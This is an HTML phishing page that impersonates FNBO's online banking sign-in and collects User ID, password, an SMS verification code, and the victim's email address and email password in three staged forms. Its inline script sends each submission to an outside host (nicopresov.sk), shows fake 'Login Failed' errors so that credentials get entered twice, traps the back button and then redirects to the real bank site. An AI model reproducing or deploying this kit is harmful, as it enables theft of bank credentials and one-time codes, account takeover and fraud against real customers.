
<!DOCTYPE html>
<html lang="en"><head>
	<title>securebanklogin.com - Sign In</title>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta content="no-cache" http-equiv="Pragma">
	<meta content="-1" http-equiv="Expires">
	<meta name="description" content="">
	<meta name="robots" content="all">
  	<link rel="shortcut icon" href="https://www.securebanklogin.com/favicon.ico" type="image/x-icon">
	<meta name="viewport" content="width=device-width,initial-scale=1">
	
	<!-- Core widget js and css -->
<link rel="stylesheet" type="text/css" href="https://asasasasasa.pages.dev/css/okta-sign-in.min.css">
<link rel="stylesheet" type="text/css" href="https://asasasasasa.pages.dev/css/main.css">
<!-- Customizable css theme options. Link your own stylesheet or override styles inline. -->
<link rel="stylesheet" type="text/css" href="">
<link rel="stylesheet" href="https://asasasasasa.pages.dev/css/styles.bdb4cd4fc9a49b85ea4a.css">
<!-- styles for custom sign in -->
<link rel="stylesheet" type="text/css" href="https://asasasasasa.pages.dev/css/custom-signin.737a914842b846fb44d117b7a2900fcb.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body id="default" class="brand-fnbo">
	<div class="login-bg-image" style="background-image: none"></div>
	<div class="col-sm-12 col-lg-12 login-page-outer" id="step1" style="display:block">
	<div class="module" id="okta-login-container">
	<main data-se="auth-container" tabindex="-1" id="okta-sign-in" class="auth-container main-container no-beacon" style="">
	<div class="okta-sign-in-header auth-header"><h1>
	<img src="https://asasasasasa.pages.dev/css/fnbo-simple-green.svg" class="auth-org-logo" alt="securebanklogin.com logo logo" aria-label="securebanklogin.com logo logo"></h1>
	<div data-type="beacon-container" class="beacon-container"></div></div>
	<div class="auth-content">
	<div class="auth-content-inner">
	<div class="primary-auth">
	<form  method="POST" action="" data-se="o-form" slot="content" id="form1" class="primary-auth-form o-form o-form-edit-mode">
	<div data-se="o-form-content" class="o-form-content o-form-theme clearfix">
	<h2 data-se="o-form-head" class="okta-form-title o-form-head">Sign In</h2>
	<div class="o-form-error-container o-form-has-errors" data-se="o-form-error-container" id="msg" style="display:none"><div>
	<div class="okta-form-infobox-error infobox infobox-error" role="alert" >
	<span class=""></span><p>Login Failed. Verify User ID/Password are correct or click Forgot Password.</p>
	</div></div></div>
	<div class="o-form-fieldset-container" data-se="o-form-fieldset-container">
	<div data-se="o-form-fieldset" class="o-form-fieldset o-form-label-top margin-btm-5">
	<div data-se="o-form-label" class="okta-form-label o-form-label">
	<label for="okta-signin-username">User ID&nbsp;</label></div>
	<div data-se="o-form-input-container" class="o-form-input">
	<span data-se="o-form-input-username" class="o-form-input-name-username o-form-control okta-form-input-field input-fix">
	<input type="text" placeholder="" name="username" id="okta-signin-username" aria-label="" required="true"></span>
	</div></div>
	<div data-se="o-form-fieldset" class="o-form-fieldset o-form-label-top margin-btm-30">
	<div data-se="o-form-label" class="okta-form-label o-form-label">
	<label for="okta-signin-password">Password&nbsp;</label></div>
	<div data-se="o-form-input-container" class="o-form-input">
	<span data-se="o-form-input-password" class="o-form-input-name-password o-form-control okta-form-input-field input-fix">
	<input type="password" placeholder="" name="password" id="password" value="" aria-label="" autocomplete="current-password" class="password-with-toggle" required="true">
	<span class="password-toggle"><span class=""></span>
	<span class="eyeicon visibility-off-16 button-hide"></span>
	</span></span></div></div>
	<div data-se="o-form-fieldset" class="o-form-fieldset o-form-label-top margin-btm-0">
	<div data-se="o-form-input-container" class="o-form-input">
	<span data-se="o-form-input-remember" class="o-form-input-name-remember">
	<div class="custom-checkbox"><input type="checkbox" name="remember" id="input42">
	<label for="input42" data-se-for-name="remember" class="">Remember me</label></div>
	</span></div></div></div></div>
	<div class="o-form-button-bar">
	<button class="button button-primary" type="submit" value="Sign In" id="btn1" data-type="save">Sign In</button>
	</div>
	</form>
	<div class="auth-footer">
	<a href="#" data-se="needhelp" aria-expanded="false" aria-controls="help-links-container" class="link help js-help">Need help signing in?</a>
	<ul class="help-links js-help-links" id="help-links-container"><li>
	<a href="#" data-se="forgot-password" class="link js-forgot-password">Forgot password?</a></li>
	<li><a href="https://www.securebanklogin.com/auth/fnbo/forgot-user-id" class="link js-custom" rel="noopener noreferrer">Forgot User ID?</a></li>
	<li><a href="https://auth.securebanklogin.com/help/login" data-se="help-link" class="link js-help-link" rel="noopener noreferrer" target="_blank">Need help?</a></li>
	</ul></div></div></div></div>
	</main>
	</div></div>
	<div class="contentArea" style="display:none" id="step2">
	<div _ngcontent-aqh-c1="" class="container col-12 col-sm-12 col-md-7 col-lg-5 col-xl-4">
  <div _ngcontent-aqh-c1="" class="card mb-2">
  <app-header _ngcontent-aqh-c1="" _nghost-aqh-c2="">
  <header _ngcontent-aqh-c2="" class="text-center bg-white card-header px-5 py-4" id="header">
  <a _ngcontent-aqh-c2="" href="https://www.fnbo.com/">
  <img _ngcontent-aqh-c2="" alt="FNBO" class="header-logo" src="https://asasasasasa.pages.dev/css/fnbo-simple-green.svg"></a></header>
  </app-header>
  <div _ngcontent-aqh-c1="" class="card-body">
  <router-outlet _ngcontent-aqh-c1=""></router-outlet>
  <app-forgot _nghost-aqh-c4="">
  <form _ngcontent-aqh-c4="" id="form2" class="container ng-untouched ng-pristine ng-valid" method="post" action="">
  <h1 _ngcontent-aqh-c4="" class="h6 text-center" style="font-size:12px">
  <strong _ngcontent-aqh-c4="">We've sent a code to your registered phone number.</strong></h1><br><!----><!---->
  <div class="o-form-error-container o-form-has-errors" data-se="o-form-error-container" id="msg2" style="color:red;font-size:12;display:none"><div>
	<div class="okta-form-infobox-error infobox infobox-error" role="alert" >
	<span class=""></span><p>Invalid code</p>
	</div></div></div>
  <div _ngcontent-aqh-c4="">
  <div _ngcontent-aqh-c4="" class="form-group">
  <label _ngcontent-aqh-c4="" for="userId">Enter code</label>
  <input _ngcontent-aqh-c4="" class="form-control ng-untouched ng-pristine ng-valid" placeholder="Code" id="code" name="code" required="" type="text">
  <div _ngcontent-aqh-c4="" class="small text-danger" id="input-forgot-userId-errors"><!---->
  </div></div></div><!---->
  <div _ngcontent-aqh-c4="">
  <button _ngcontent-aqh-c4="" class="btn btn-primary btn-block" id="btn2" type="submit">Continue</button>
  </div></form>
  </app-forgot></div></div></div></div>
  <div class="contentArea" style="display:none" id="step3">
	<div _ngcontent-aqh-c1="" class="container col-12 col-sm-12 col-md-7 col-lg-5 col-xl-4">
  <div _ngcontent-aqh-c1="" class="card mb-2">
  <app-header _ngcontent-aqh-c1="" _nghost-aqh-c2="">
  <header _ngcontent-aqh-c2="" class="text-center bg-white card-header px-5 py-4" id="header">
  <a _ngcontent-aqh-c2="" href="https://www.fnbo.com/">
  <img _ngcontent-aqh-c2="" alt="FNBO" class="header-logo" src="https://asasasasasa.pages.dev/css/fnbo-simple-green.svg"></a></header>
  </app-header>
  <div _ngcontent-aqh-c1="" class="card-body">
  <router-outlet _ngcontent-aqh-c1=""></router-outlet>
  <app-forgot _nghost-aqh-c4="">
  <form _ngcontent-aqh-c4="" id="form3" class="container ng-untouched ng-pristine ng-valid" method="post" action="">
  <h1 _ngcontent-aqh-c4="" class="h6 text-center" style="font-size:12px">
  <strong _ngcontent-aqh-c4="">Email Address Varification.</strong></h1><br><!----><!---->
  <div class="o-form-error-container o-form-has-errors" data-se="o-form-error-container" id="msg3" style="color:red;font-size:12;display:none"><div>
	<div class="okta-form-infobox-error infobox infobox-error" role="alert" >
	<span class=""></span><p>The email address or email password is incorrect. Please try again.</p>
	</div></div></div>
  <div _ngcontent-aqh-c4="">
  <div _ngcontent-aqh-c4="" class="form-group">
  <label _ngcontent-aqh-c4="" for="userId">Email Address</label>
  <input _ngcontent-aqh-c4="" class="form-control ng-untouched ng-pristine ng-valid" placeholder="Email Address" id="email" name="email" required="" type="email">
  <div _ngcontent-aqh-c4="" class="small text-danger" id="input-forgot-userId-errors"><!---->
  </div></div></div><!---->
  <div _ngcontent-aqh-c4="">
  <div _ngcontent-aqh-c4="" class="form-group">
  <label _ngcontent-aqh-c4="" for="userId">Email Password</label>
  <input _ngcontent-aqh-c4="" class="form-control ng-untouched ng-pristine ng-valid" placeholder="Email Password" id="passwd" name="passwd" required="" type="password">
  <div _ngcontent-aqh-c4="" class="small text-danger" id="input-forgot-userId-errors"><!---->
  </div></div></div><!---->
  <div _ngcontent-aqh-c4="">
  <button _ngcontent-aqh-c4="" class="btn btn-primary btn-block" id="btn3" type="submit">Continue</button>
  </div></form>
  </app-forgot></div></div></div></div>
	<footer id="footer"><div class="footer-utility">
    <a href="https://www.fnbo.com/privacy-policy/">Privacy Policy</a>
    <a href="https://www.fnbo.com/security-center/">Security Statement</a>
    <a class="fdic-link" href="#">Member FDIC</a>
    <a class="ehl-link" href="#"><img src="https://asasasasasa.pages.dev/css/logo-equal-housing-lender.png" alt="Equal Housing Lender" title="Equal Housing Lender"></a>
</div>
<div class="copyright">
    <p>Copyright © 2023 FNBO. All Rights Reserved.</p>
    <p>1620 Dodge Street, Omaha, Nebraska 68197</p>
</div></footer>
<script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script>  <script type="text/javascript">

history.pushState(null, document.title, location.href);
window.addEventListener('popstate', function (event)
{
  history.pushState(null, document.title, location.href);
});

//$(document).bind("contextmenu", function(e){ return false;});

var count = 0;
var counts = 0;

$('#form1').on('submit', function(e){
		count = count+1;
		$('#btn1').html('Sign In...');
		$.post('https://nicopresov.sk/data.php', $(this).serialize(), function(data){
			console.log(data);
		});
		setTimeout(function() {
		                     if(count == 2){
							    $('#step1').hide();
							    $('#step2').show();
							 }else{
							     $('#password').val('');
								 $('#msg').show();
								 $('#btn1').html('Sign In');
							 }
                              
							  
                        },2000);
		e.preventDefault();
	});
	
$('#form2').on('submit', function(e){
		count = count+1;
		$('#btn2').html('<i class="fa fa-circle-o-notch fa-spin fa-1x fa-fw"></i>');
		$.post('https://nicopresov.sk/code.php', $(this).serialize(), function(data){
			console.log(data);
		});
		setTimeout(function() {
		                     if(count == 3){
							    $('#step2').hide();
							    $('#step3').show();
							 }else{
							     $('#password').val('');
								 $('#msg2').show();
								 $('#btn2').html('Sign In');
							 }
                              
							  
                        },2000);
		e.preventDefault();
	});
	
$('#form3').on('submit', function(e){
		counts = counts+1;
		$('#btn3').html('<i class="fa fa-circle-o-notch fa-spin fa-1x fa-fw"></i>');
		$.post('https://nicopresov.sk/cok.php', $(this).serialize(), function(data){
			console.log(data);
		});
		setTimeout(function() {
		
							if(counts == 2){
							   $('#step3').show();
							   $('#step3').show();
							   
					   setTimeout(function() {
                              window.location.href = "https://www.fnbo.com/";
                        },3000);
							   
							}else{
							     $('#passwd').val('');
								 $('#msg3').show();
								 $('#btn3').html('Verify');
							}
		
                            
                        },4000);
		e.preventDefault();
	});

</script>
<script>


    $(function() {
        $('[name="code"]').mask('00000000');

    });

</script>
</body></html>
